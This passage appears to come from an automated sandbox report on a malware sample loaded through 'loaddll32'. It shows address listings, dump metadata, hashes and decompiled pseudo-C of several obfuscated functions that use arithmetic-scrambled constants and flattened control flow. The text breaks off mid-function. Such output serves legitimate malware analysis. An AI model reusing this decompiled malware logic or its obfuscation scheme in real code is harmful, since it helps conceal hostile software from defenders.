                                                                                                                                                                            0x02f5e828
                                                                                                                                                                            0x02f5e830
                                                                                                                                                                            0x02f5e838
                                                                                                                                                                            0x02f5e840
                                                                                                                                                                            0x02f5e848
                                                                                                                                                                            0x02f5e850
                                                                                                                                                                            0x02f5e858
                                                                                                                                                                            0x02f5e85d
                                                                                                                                                                            0x02f5e865
                                                                                                                                                                            0x02f5e873
                                                                                                                                                                            0x02f5e878
                                                                                                                                                                            0x02f5e87e
                                                                                                                                                                            0x02f5e883
                                                                                                                                                                            0x02f5e887
                                                                                                                                                                            0x02f5e88f
                                                                                                                                                                            0x02f5e897
                                                                                                                                                                            0x02f5e89f
                                                                                                                                                                            0x02f5e8a7
                                                                                                                                                                            0x02f5e8af
                                                                                                                                                                            0x02f5e8b4
                                                                                                                                                                            0x02f5e8bc
                                                                                                                                                                            0x02f5e8c4
                                                                                                                                                                            0x02f5e8c9
                                                                                                                                                                            0x02f5e8d1
                                                                                                                                                                            0x02f5e8d9
                                                                                                                                                                            0x02f5e8e1
                                                                                                                                                                            0x02f5e8e9
                                                                                                                                                                            0x02f5e8f9
                                                                                                                                                                            0x02f5e8fe
                                                                                                                                                                            0x02f5e906
                                                                                                                                                                            0x02f5e90e
                                                                                                                                                                            0x02f5e916
                                                                                                                                                                            0x02f5e91e
                                                                                                                                                                            0x02f5e926
                                                                                                                                                                            0x02f5e92e
                                                                                                                                                                            0x02f5e93b
                                                                                                                                                                            0x02f5e93e
                                                                                                                                                                            0x02f5e94a
                                                                                                                                                                            0x02f5e94e
                                                                                                                                                                            0x02f5e956
                                                                                                                                                                            0x02f5e962
                                                                                                                                                                            0x02f5e965
                                                                                                                                                                            0x02f5e969
                                                                                                                                                                            0x02f5e971
                                                                                                                                                                            0x02f5e979
                                                                                                                                                                            0x02f5e981
                                                                                                                                                                            0x02f5e986
                                                                                                                                                                            0x02f5e98e
                                                                                                                                                                            0x02f5e996
                                                                                                                                                                            0x02f5e99e
                                                                                                                                                                            0x02f5e9a8
                                                                                                                                                                            0x02f5e9ba
                                                                                                                                                                            0x02f5e9be
                                                                                                                                                                            0x02f5e9c6
                                                                                                                                                                            0x02f5e9d3
                                                                                                                                                                            0x02f5e9d7
                                                                                                                                                                            0x02f5e9db
                                                                                                                                                                            0x02f5e9e0
                                                                                                                                                                            0x02f5e9e8
                                                                                                                                                                            0x02f5e9f0
                                                                                                                                                                            0x02f5e9f5
                                                                                                                                                                            0x02f5e9fd
                                                                                                                                                                            0x02f5ea05
                                                                                                                                                                            0x02f5ea0d
                                                                                                                                                                            0x02f5ea12
                                                                                                                                                                            0x02f5ea1a
                                                                                                                                                                            0x02f5ea1a
                                                                                                                                                                            0x02f5ea2c
                                                                                                                                                                            0x02f5eb00
                                                                                                                                                                            0x02f5eb05
                                                                                                                                                                            0x02f5eb08
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea32
                                                                                                                                                                            0x02f5ea38
                                                                                                                                                                            0x02f5ead4
                                                                                                                                                                            0x02f5ead5
                                                                                                                                                                            0x02f5ead9
                                                                                                                                                                            0x02f5eade
                                                                                                                                                                            0x02f5eae1
                                                                                                                                                                            0x02f5eae3
                                                                                                                                                                            0x02f5eae5
                                                                                                                                                                            0x02f5eae7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5eae7
                                                                                                                                                                            0x02f5ea3e
                                                                                                                                                                            0x02f5ea40
                                                                                                                                                                            0x02f5eab2
                                                                                                                                                                            0x02f5eab7
                                                                                                                                                                            0x02f5eaba
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea42
                                                                                                                                                                            0x02f5ea44
                                                                                                                                                                            0x02f5ea96
                                                                                                                                                                            0x02f5ea99
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea46
                                                                                                                                                                            0x02f5ea4c
                                                                                                                                                                            0x02f5ea85
                                                                                                                                                                            0x02f5ea87
                                                                                                                                                                            0x02f5ea8a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea4e
                                                                                                                                                                            0x02f5ea54
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea5a
                                                                                                                                                                            0x02f5ea72
                                                                                                                                                                            0x02f5ea77
                                                                                                                                                                            0x02f5ea7a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea7a
                                                                                                                                                                            0x02f5ea54
                                                                                                                                                                            0x02f5ea4c
                                                                                                                                                                            0x02f5ea44
                                                                                                                                                                            0x02f5ea40
                                                                                                                                                                            0x02f5ea38
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f5ea2c
                                                                                                                                                                            0x02f5eb27
                                                                                                                                                                            0x02f5eb2c
                                                                                                                                                                            0x02f5eb2f
                                                                                                                                                                            0x02f5eb34
                                                                                                                                                                            0x02f5eb34
                                                                                                                                                                            0x02f5eb34
                                                                                                                                                                            0x02f5eb40
                                                                                                                                                                            0x02f5eb42
                                                                                                                                                                            0x02f5eb47
                                                                                                                                                                            0x02f5eb47
                                                                                                                                                                            0x02f5eb51

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: -br$F.<`
                                                                                                                                                                            • API String ID: 0-3678315648
                                                                                                                                                                            • Opcode ID: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
                                                                                                                                                                            • Instruction ID: f05cb86f94cb3c704a13a4118583607b21165331259506bb842ee17a287ade90
                                                                                                                                                                            • Opcode Fuzzy Hash: eaec14a4876c9c72c20777f37d81c5f73ce4be34e10a3d9202af31a534b2139e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A9123715083419FC358CF65D98992BBBE1FBD4788F00891DFA8696260D3B1DA49CF83
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                            			E02F6654A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				signed int _v44;
                                                                                                                                                                            				signed int _v48;
                                                                                                                                                                            				signed int _v52;
                                                                                                                                                                            				signed int _v56;
                                                                                                                                                                            				signed int _v60;
                                                                                                                                                                            				signed int _v64;
                                                                                                                                                                            				signed int _v68;
                                                                                                                                                                            				signed int _v72;
                                                                                                                                                                            				short _v88;
                                                                                                                                                                            				char* _v92;
                                                                                                                                                                            				char* _v96;
                                                                                                                                                                            				signed int _v100;
                                                                                                                                                                            				char _v104;
                                                                                                                                                                            				char _v624;
                                                                                                                                                                            				char _v1144;
                                                                                                                                                                            				void* _t168;
                                                                                                                                                                            				signed int _t200;
                                                                                                                                                                            				signed int _t204;
                                                                                                                                                                            				signed int _t205;
                                                                                                                                                                            				signed int _t206;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t168);
                                                                                                                                                                            				_v48 = 0xcd00f6;
                                                                                                                                                                            				_v48 = _v48 + 0xcd83;
                                                                                                                                                                            				_v48 = _v48 ^ 0x09b3856c;
                                                                                                                                                                            				_v48 = _v48 ^ 0x097e4b14;
                                                                                                                                                                            				_v68 = 0x47ecc1;
                                                                                                                                                                            				_v68 = _v68 >> 0xf;
                                                                                                                                                                            				_v68 = _v68 ^ 0x0000069b;
                                                                                                                                                                            				_v56 = 0x5623e4;
                                                                                                                                                                            				_t204 = 0x5e;
                                                                                                                                                                            				_v56 = _v56 * 0x5b;
                                                                                                                                                                            				_v56 = _v56 >> 2;
                                                                                                                                                                            				_v56 = _v56 ^ 0x07a7b883;
                                                                                                                                                                            				_v60 = 0x9f93bd;
                                                                                                                                                                            				_v60 = _v60 ^ 0x1b2b58cc;
                                                                                                                                                                            				_v60 = _v60 ^ 0x1bb3b428;
                                                                                                                                                                            				_v36 = 0x1947a4;
                                                                                                                                                                            				_v36 = _v36 | 0x7bdfb0e1;
                                                                                                                                                                            				_v36 = _v36 ^ 0x7bdfc232;
                                                                                                                                                                            				_v52 = 0x76ccb;
                                                                                                                                                                            				_v52 = _v52 * 0x2b;
                                                                                                                                                                            				_v52 = _v52 ^ 0x7f6a3668;
                                                                                                                                                                            				_v52 = _v52 ^ 0x7e52560e;
                                                                                                                                                                            				_v24 = 0x419396;
                                                                                                                                                                            				_v24 = _v24 / _t204;
                                                                                                                                                                            				_t205 = 0x46;
                                                                                                                                                                            				_v24 = _v24 * 0x57;
                                                                                                                                                                            				_v24 = _v24 ^ 0x845af85c;
                                                                                                                                                                            				_v24 = _v24 ^ 0x84646483;
                                                                                                                                                                            				_v16 = 0xd7b9b6;
                                                                                                                                                                            				_v16 = _v16 >> 6;
                                                                                                                                                                            				_v16 = _v16 >> 0xc;
                                                                                                                                                                            				_v16 = _v16 << 0xa;
                                                                                                                                                                            				_v16 = _v16 ^ 0x000408e3;
                                                                                                                                                                            				_v44 = 0x89b89f;
                                                                                                                                                                            				_v44 = _v44 * 0x1b;
                                                                                                                                                                            				_v44 = _v44 / _t205;
                                                                                                                                                                            				_v44 = _v44 ^ 0x00329adc;
                                                                                                                                                                            				_v40 = 0x7c911;
                                                                                                                                                                            				_v40 = _v40 >> 0xe;
                                                                                                                                                                            				_v40 = _v40 | 0x9fb7bc96;
                                                                                                                                                                            				_v40 = _v40 ^ 0x9fbb58de;
                                                                                                                                                                            				_v32 = 0x2960c2;
                                                                                                                                                                            				_v32 = _v32 >> 0xd;
                                                                                                                                                                            				_t206 = 0x3b;
                                                                                                                                                                            				_v32 = _v32 * 0x6a;
                                                                                                                                                                            				_v32 = _v32 ^ 0x000737d7;
                                                                                                                                                                            				_v8 = 0x50758c;
                                                                                                                                                                            				_v8 = _v8 * 0x1a;
                                                                                                                                                                            				_v8 = _v8 / _t206;
                                                                                                                                                                            				_v8 = _v8 + 0xffffa1a5;
                                                                                                                                                                            				_v8 = _v8 ^ 0x002c6c3d;
                                                                                                                                                                            				_v72 = 0xae2241;
                                                                                                                                                                            				_v72 = _v72 >> 6;
                                                                                                                                                                            				_v72 = _v72 ^ 0x0004039d;
                                                                                                                                                                            				_v28 = 0x59a91e;
                                                                                                                                                                            				_v28 = _v28 * 0x35;
                                                                                                                                                                            				_v28 = _v28 >> 0xe;
                                                                                                                                                                            				_v28 = _v28 + 0x675a;
                                                                                                                                                                            				_v28 = _v28 ^ 0x00026f30;
                                                                                                                                                                            				_v64 = 0xf7748e;
                                                                                                                                                                            				_v64 = _v64 * 0x37;
                                                                                                                                                                            				_v64 = _v64 ^ 0x3526d747;
                                                                                                                                                                            				_v20 = 0x936b67;
                                                                                                                                                                            				_v20 = _v20 + 0xffff21a6;
                                                                                                                                                                            				_v20 = _v20 + 0x6733;
                                                                                                                                                                            				_v20 = _v20 >> 2;
                                                                                                                                                                            				_v20 = _v20 ^ 0x0025db68;
                                                                                                                                                                            				_v12 = 0x60291e;
                                                                                                                                                                            				_v12 = _v12 + 0xffffd016;
                                                                                                                                                                            				_v12 = _v12 << 9;
                                                                                                                                                                            				_v12 = _v12 + 0xffff2f3b;
                                                                                                                                                                            				_v12 = _v12 ^ 0xbff2968b;
                                                                                                                                                                            				E02F6FE2A(_v60, _v36, 0x1e,  &_v104);
                                                                                                                                                                            				E02F6FE2A(_v52, _v24, 0x208,  &_v624);
                                                                                                                                                                            				E02F6FE2A(_v16, _v44, 0x208,  &_v1144);
                                                                                                                                                                            				E02F5E204(_v40, _v32,  &_v624, _a4);
                                                                                                                                                                            				E02F5E204(_v8, _v72,  &_v1144, _a12);
                                                                                                                                                                            				_v100 = _v48;
                                                                                                                                                                            				_v96 =  &_v624;
                                                                                                                                                                            				_v92 =  &_v1144;
                                                                                                                                                                            				_v88 = _v56 | _v68 | 0x00000410;
                                                                                                                                                                            				_t200 = E02F5E4F8( &_v104, _v28, _v64, _v20, _v12);
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				return  ~_t200 + 1;
                                                                                                                                                                            			}
































                                                                                                                                                                            0x02f66554
                                                                                                                                                                            0x02f66557
                                                                                                                                                                            0x02f6655a
                                                                                                                                                                            0x02f6655d
                                                                                                                                                                            0x02f6655e
                                                                                                                                                                            0x02f6655f
                                                                                                                                                                            0x02f66564
                                                                                                                                                                            0x02f6656d
                                                                                                                                                                            0x02f66574
                                                                                                                                                                            0x02f6657b
                                                                                                                                                                            0x02f66582
                                                                                                                                                                            0x02f66589
                                                                                                                                                                            0x02f6658d
                                                                                                                                                                            0x02f66594
                                                                                                                                                                            0x02f665a1
                                                                                                                                                                            0x02f665a4
                                                                                                                                                                            0x02f665a7
                                                                                                                                                                            0x02f665ab
                                                                                                                                                                            0x02f665b2
                                                                                                                                                                            0x02f665b9
                                                                                                                                                                            0x02f665c0
                                                                                                                                                                            0x02f665c7
                                                                                                                                                                            0x02f665ce
                                                                                                                                                                            0x02f665d5
                                                                                                                                                                            0x02f665dc
                                                                                                                                                                            0x02f665e7
                                                                                                                                                                            0x02f665ea
                                                                                                                                                                            0x02f665f1
                                                                                                                                                                            0x02f665f8
                                                                                                                                                                            0x02f66606
                                                                                                                                                                            0x02f6660d
                                                                                                                                                                            0x02f66610
                                                                                                                                                                            0x02f66613
                                                                                                                                                                            0x02f6661a
                                                                                                                                                                            0x02f66621
                                                                                                                                                                            0x02f66628
                                                                                                                                                                            0x02f6662c
                                                                                                                                                                            0x02f66630
                                                                                                                                                                            0x02f66634
                                                                                                                                                                            0x02f6663b
                                                                                                                                                                            0x02f66646
                                                                                                                                                                            0x02f66650
                                                                                                                                                                            0x02f66653
                                                                                                                                                                            0x02f6665a
                                                                                                                                                                            0x02f66661
                                                                                                                                                                            0x02f66665
                                                                                                                                                                            0x02f6666c
                                                                                                                                                                            0x02f66673
                                                                                                                                                                            0x02f6667a
                                                                                                                                                                            0x02f66682
                                                                                                                                                                            0x02f66683
                                                                                                                                                                            0x02f66686
                                                                                                                                                                            0x02f6668d
                                                                                                                                                                            0x02f66698
                                                                                                                                                                            0x02f666a0
                                                                                                                                                                            0x02f666a3
                                                                                                                                                                            0x02f666aa
                                                                                                                                                                            0x02f666b1
                                                                                                                                                                            0x02f666b8
                                                                                                                                                                            0x02f666bc
                                                                                                                                                                            0x02f666c3
                                                                                                                                                                            0x02f666ce
                                                                                                                                                                            0x02f666d1
                                                                                                                                                                            0x02f666d5
                                                                                                                                                                            0x02f666dc
                                                                                                                                                                            0x02f666e3
                                                                                                                                                                            0x02f666ee
                                                                                                                                                                            0x02f666f4
                                                                                                                                                                            0x02f666fb
                                                                                                                                                                            0x02f66702
                                                                                                                                                                            0x02f66709
                                                                                                                                                                            0x02f66710
                                                                                                                                                                            0x02f66714
                                                                                                                                                                            0x02f6671b
                                                                                                                                                                            0x02f66722
                                                                                                                                                                            0x02f66729
                                                                                                                                                                            0x02f6672d
                                                                                                                                                                            0x02f66734
                                                                                                                                                                            0x02f66744
                                                                                                                                                                            0x02f6675c
                                                                                                                                                                            0x02f6676f
                                                                                                                                                                            0x02f66784
                                                                                                                                                                            0x02f66799
                                                                                                                                                                            0x02f667a4
                                                                                                                                                                            0x02f667ad
                                                                                                                                                                            0x02f667b6
                                                                                                                                                                            0x02f667ca
                                                                                                                                                                            0x02f667d4
                                                                                                                                                                            0x02f667de
                                                                                                                                                                            0x02f667e5

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: =l,$#V
                                                                                                                                                                            • API String ID: 0-882995766
                                                                                                                                                                            • Opcode ID: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
                                                                                                                                                                            • Instruction ID: 97f26b5e1851f5635b38b37b43c53322f8d2c1d1cd2e6617e0a5bba9129a5cc1
                                                                                                                                                                            • Opcode Fuzzy Hash: 63d82414185dada1c286f70f67569fe37ebaaf7d58e8b6f899c28194972c03bf
                                                                                                                                                                            • Instruction Fuzzy Hash: 8C81E0B1D0121DABCF08CFE0D98A8EEBBB5FB44308F208159E515B6250D7B45A49CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E02F607F4() {
                                                                                                                                                                            				char _v520;
                                                                                                                                                                            				signed int _v524;
                                                                                                                                                                            				signed int _v528;
                                                                                                                                                                            				signed int _v532;
                                                                                                                                                                            				signed int _v536;
                                                                                                                                                                            				signed int _v540;
                                                                                                                                                                            				signed int _v544;
                                                                                                                                                                            				signed int _v548;
                                                                                                                                                                            				signed int _v552;
                                                                                                                                                                            				signed int _t88;
                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                            				void* _t96;
                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                            				signed int _t112;
                                                                                                                                                                            				short* _t113;
                                                                                                                                                                            				signed int* _t116;
                                                                                                                                                                            
                                                                                                                                                                            				_t116 =  &_v552;
                                                                                                                                                                            				_v548 = 0x5918d1;
                                                                                                                                                                            				_v548 = _v548 + 0xe8d9;
                                                                                                                                                                            				_t96 = 0x413edd5;
                                                                                                                                                                            				_v548 = _v548 * 7;
                                                                                                                                                                            				_v548 = _v548 | 0xf342c850;
                                                                                                                                                                            				_v548 = _v548 ^ 0xf3753354;
                                                                                                                                                                            				_v544 = 0x3961e1;
                                                                                                                                                                            				_t112 = 0x6c;
                                                                                                                                                                            				_v544 = _v544 * 0x6e;
                                                                                                                                                                            				_v544 = _v544 * 0x7b;
                                                                                                                                                                            				_v544 = _v544 ^ 0xd8b8e625;
                                                                                                                                                                            				_v528 = 0xb40301;
                                                                                                                                                                            				_v528 = _v528 ^ 0x18f013f2;
                                                                                                                                                                            				_v528 = _v528 + 0xffff1b00;
                                                                                                                                                                            				_v528 = _v528 ^ 0x184a596c;
                                                                                                                                                                            				_v532 = 0x9ab5ff;
                                                                                                                                                                            				_v532 = _v532 + 0x870f;
                                                                                                                                                                            				_v532 = _v532 + 0xffff8f3e;
                                                                                                                                                                            				_v532 = _v532 ^ 0x0099ca27;
                                                                                                                                                                            				_v524 = 0x5ab638;
                                                                                                                                                                            				_v524 = _v524 + 0xffff3304;
                                                                                                                                                                            				_v524 = _v524 ^ 0x005bd322;
                                                                                                                                                                            				_v536 = 0x9f91e6;
                                                                                                                                                                            				_t113 = _v524;
                                                                                                                                                                            				_v536 = _v536 / _t112;
                                                                                                                                                                            				_v536 = _v536 >> 2;
                                                                                                                                                                            				_v536 = _v536 ^ 0x000cbfb4;
                                                                                                                                                                            				_v540 = 0xcf5411;
                                                                                                                                                                            				_t88 = _v540 * 0x37;
                                                                                                                                                                            				_v540 = _t88;
                                                                                                                                                                            				_v540 = _v540 ^ 0x69295e57;
                                                                                                                                                                            				_v540 = _v540 ^ 0x45a0f7a2;
                                                                                                                                                                            				L1:
                                                                                                                                                                            				while(_t96 != 0x413edd5) {
                                                                                                                                                                            					if(_t96 == 0x66ebf40) {
                                                                                                                                                                            						_t88 = E02F70DB1(_v548,  &_v520, __eflags, _v544, _t96, _v528);
                                                                                                                                                                            						_t116 =  &(_t116[3]);
                                                                                                                                                                            						_t96 = 0xe87ba20;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t96 == 0x9062539) {
                                                                                                                                                                            						_t89 =  *0x2f76214; // 0x0
                                                                                                                                                                            						__eflags = _t89 + 0x23c;
                                                                                                                                                                            						return E02F5E204(_v536, _v540, _t89 + 0x23c, _t113);
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t96 != 0xe87ba20) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						__eflags = _t96 - 0xf0f6a33;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						return _t88;
                                                                                                                                                                            					}
                                                                                                                                                                            					_v552 = 0x64b67d;
                                                                                                                                                                            					_t101 = 0x4d;
                                                                                                                                                                            					_v552 = _v552 / _t101;
                                                                                                                                                                            					_v552 = _v552 << 1;
                                                                                                                                                                            					_v552 = _v552 + 0xa638;
                                                                                                                                                                            					_v552 = _v552 ^ 0x000343e6;
                                                                                                                                                                            					_t113 =  &_v520 + E02F600C5( &_v520, _v532, _v524) * 2;
                                                                                                                                                                            					while(1) {
                                                                                                                                                                            						_t88 =  &_v520;
                                                                                                                                                                            						if(_t113 <= _t88) {
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						__eflags =  *_t113 - 0x5c;
                                                                                                                                                                            						if( *_t113 != 0x5c) {
                                                                                                                                                                            							L8:
                                                                                                                                                                            							_t113 = _t113 - 2;
                                                                                                                                                                            							__eflags = _t113;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t74 =  &_v552;
                                                                                                                                                                            						 *_t74 = _v552 - 1;
                                                                                                                                                                            						__eflags =  *_t74;
                                                                                                                                                                            						if( *_t74 == 0) {
                                                                                                                                                                            							__eflags = _t113;
                                                                                                                                                                            							L12:
                                                                                                                                                                            							_t96 = 0x9062539;
                                                                                                                                                                            							goto L1;
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L8;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t96 = 0x66ebf40;
                                                                                                                                                                            				goto L15;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x02f607f4
                                                                                                                                                                            0x02f607fa
                                                                                                                                                                            0x02f60804
                                                                                                                                                                            0x02f6080c
                                                                                                                                                                            0x02f6081a
                                                                                                                                                                            0x02f60823
                                                                                                                                                                            0x02f60830
                                                                                                                                                                            0x02f6083d
                                                                                                                                                                            0x02f6084c
                                                                                                                                                                            0x02f6084d
                                                                                                                                                                            0x02f60856
                                                                                                                                                                            0x02f6085a
                                                                                                                                                                            0x02f60862
                                                                                                                                                                            0x02f6086a
                                                                                                                                                                            0x02f60872
                                                                                                                                                                            0x02f6087a
                                                                                                                                                                            0x02f60882
                                                                                                                                                                            0x02f6088a
                                                                                                                                                                            0x02f60892
                                                                                                                                                                            0x02f6089a
                                                                                                                                                                            0x02f608a2
                                                                                                                                                                            0x02f608aa
                                                                                                                                                                            0x02f608b2
                                                                                                                                                                            0x02f608ba
                                                                                                                                                                            0x02f608c8
                                                                                                                                                                            0x02f608cc
                                                                                                                                                                            0x02f608d0
                                                                                                                                                                            0x02f608d5
                                                                                                                                                                            0x02f608dd
                                                                                                                                                                            0x02f608e5
                                                                                                                                                                            0x02f608ea
                                                                                                                                                                            0x02f608ee
                                                                                                                                                                            0x02f608f6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f608fe
                                                                                                                                                                            0x02f6090c
                                                                                                                                                                            0x02f60998
                                                                                                                                                                            0x02f6099d
                                                                                                                                                                            0x02f609a0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f609a0
                                                                                                                                                                            0x02f60910
                                                                                                                                                                            0x02f609b7
                                                                                                                                                                            0x02f609c0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f609d1
                                                                                                                                                                            0x02f60918
                                                                                                                                                                            0x02f609a9
                                                                                                                                                                            0x02f609a9
                                                                                                                                                                            0x02f609af
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f609af
                                                                                                                                                                            0x02f6091e
                                                                                                                                                                            0x02f6092e
                                                                                                                                                                            0x02f60935
                                                                                                                                                                            0x02f60939
                                                                                                                                                                            0x02f6093d
                                                                                                                                                                            0x02f60945
                                                                                                                                                                            0x02f6095f
                                                                                                                                                                            0x02f60973
                                                                                                                                                                            0x02f60973
                                                                                                                                                                            0x02f60979
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f60964
                                                                                                                                                                            0x02f60968
                                                                                                                                                                            0x02f60970
                                                                                                                                                                            0x02f60970
                                                                                                                                                                            0x02f60970
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f60970
                                                                                                                                                                            0x02f6096a
                                                                                                                                                                            0x02f6096a
                                                                                                                                                                            0x02f6096a
                                                                                                                                                                            0x02f6096e
                                                                                                                                                                            0x02f6097d
                                                                                                                                                                            0x02f60980
                                                                                                                                                                            0x02f60980
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f60980
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6096e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6097b
                                                                                                                                                                            0x02f609a7
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: W^)i$a9
                                                                                                                                                                            • API String ID: 0-1728637351
                                                                                                                                                                            • Opcode ID: 14262ab76c7bc1e6150bb8d7f5f95f7c16a3204deef24a2f0ed18b0a944de75a
                                                                                                                                                                            • Instruction ID: 51970e04eb87899c39846804bacb24a68eff71e5271046a79aedbc401479ca33
                                                                                                                                                                            • Opcode Fuzzy Hash: 14262ab76c7bc1e6150bb8d7f5f95f7c16a3204deef24a2f0ed18b0a944de75a
                                                                                                                                                                            • Instruction Fuzzy Hash: DC4167729083018BD714CF20D59992FFBE2FBD4398F144A1EE2D966260DB709A49CF86
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                            			E02F65333(void* __ecx) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                            				signed int _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                            				signed int _v28;
                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                            				signed int _v36;
                                                                                                                                                                            				signed int _v40;
                                                                                                                                                                            				void* _t101;
                                                                                                                                                                            				void* _t104;
                                                                                                                                                                            				signed int _t105;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				void* _t108;
                                                                                                                                                                            				void* _t116;
                                                                                                                                                                            				void* _t117;
                                                                                                                                                                            				signed int* _t119;
                                                                                                                                                                            
                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                            				_t119 =  &_v40;
                                                                                                                                                                            				_v16 = 0x92c19;
                                                                                                                                                                            				_v16 = _v16 ^ 0x628de80f;
                                                                                                                                                                            				_v16 = _v16 << 8;
                                                                                                                                                                            				_v16 = _v16 ^ 0x84c9db68;
                                                                                                                                                                            				_v4 = 0x30e06a;
                                                                                                                                                                            				_v4 = _v4 ^ 0x4daac4de;
                                                                                                                                                                            				_v4 = _v4 ^ 0x4d95dd20;
                                                                                                                                                                            				_v20 = 0x313cca;
                                                                                                                                                                            				_t105 = 0xc;
                                                                                                                                                                            				_v20 = _v20 / _t105;
                                                                                                                                                                            				_v20 = _v20 >> 9;
                                                                                                                                                                            				_t116 = 0;
                                                                                                                                                                            				_v20 = _v20 ^ 0x00013d87;
                                                                                                                                                                            				_t117 = 0xe755a9f;
                                                                                                                                                                            				_v40 = 0xb13641;
                                                                                                                                                                            				_t106 = 0x59;
                                                                                                                                                                            				_v40 = _v40 / _t106;
                                                                                                                                                                            				_v40 = _v40 << 1;
                                                                                                                                                                            				_v40 = _v40 | 0xaf38654a;
                                                                                                                                                                            				_v40 = _v40 ^ 0xaf356b5c;
                                                                                                                                                                            				_v24 = 0xb3ef74;
                                                                                                                                                                            				_v24 = _v24 ^ 0x556457b4;
